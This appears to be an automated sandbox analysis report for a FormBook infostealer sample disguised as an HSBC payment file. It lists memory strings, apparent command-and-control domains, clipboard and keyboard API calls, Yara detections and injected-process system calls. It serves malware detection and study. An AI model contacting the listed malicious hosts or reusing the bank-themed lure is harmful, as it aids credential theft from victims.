Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.3
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28903/search.png)
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/29590/bg1.png)
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: sdchange.exe, 00000005.00000002.3958580894.0000000006212000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000003FC2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://inf30027group23.xyz/3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.Crochetpets.online
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.crochetpets.online/Crochet_Baby.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkci
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.crochetpets.online/Crochet_Cotton.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqk
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.crochetpets.online/Crochet_Flowers.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEq
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.crochetpets.online/Crochet_Patterns.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupE
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.crochetpets.online/Pet_Apparel.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkciy
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.crochetpets.online/__media__/design/underconstructionnotice.php?d=crochetpets.online
Source: sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.crochetpets.online/__media__/js/trademark.php?d=crochetpets.online&type=ns
Source: EqOUZfSIzU.exe, 00000006.00000002.3959254630.0000000005588000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.donante-de-ovulos.biz
Source: EqOUZfSIzU.exe, 00000006.00000002.3959254630.0000000005588000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.donante-de-ovulos.biz/g3wl/
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://cdn.consentmanager.net
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://delivery.consentmanager.net
Source: firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sdchange.exe, 00000005.00000002.3954559304.0000000003001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdchange.exe, 00000005.00000003.2566984871.0000000007F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: sdchange.exe, 00000005.00000002.3954559304.0000000003001000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdchange.exe, 00000005.00000002.3954559304.0000000003001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sdchange.exe, 00000005.00000002.3954559304.0000000003023000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sdchange.exe, 00000005.00000002.3958580894.0000000005EEE000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.00000000063A4000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000003C9E000.00000004.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000004154000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00794164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00794164

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00794164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00794164

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00793F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00793F66

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_0078001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0078001C

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007ACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_007ACABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00723B3A
Source: rHSBCBank_Paymentswiftcpy.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8016e3c2-b
Source: rHSBCBank_Paymentswiftcpy.exe, 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_24ef2490-d
Source: rHSBCBank_Paymentswiftcpy.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4f619af8-2
Source: rHSBCBank_Paymentswiftcpy.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_4c5ffa2a-5

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: rHSBCBank_Paymentswiftcpy.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C143 NtClose,	2_2_0042C143
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A9BA NtAllocateVirtualMemory,	2_2_0040A9BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040AA62 NtAllocateVirtualMemory,	2_2_0040AA62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972B60 NtClose,LdrInitializeThunk,	2_2_03972B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03972DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,	2_2_039735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03974340 NtSetContextThread,	2_2_03974340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03974650 NtSuspendThread,	2_2_03974650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972B80 NtQueryInformationFile,	2_2_03972B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972BA0 NtEnumerateValueKey,	2_2_03972BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972BF0 NtAllocateVirtualMemory,	2_2_03972BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972BE0 NtQueryValueKey,	2_2_03972BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972AB0 NtWaitForSingleObject,	2_2_03972AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972AD0 NtReadFile,	2_2_03972AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972AF0 NtWriteFile,	2_2_03972AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972F90 NtProtectVirtualMemory,	2_2_03972F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972FB0 NtResumeThread,	2_2_03972FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972FA0 NtQuerySection,	2_2_03972FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972FE0 NtCreateFile,	2_2_03972FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972F30 NtCreateSection,	2_2_03972F30
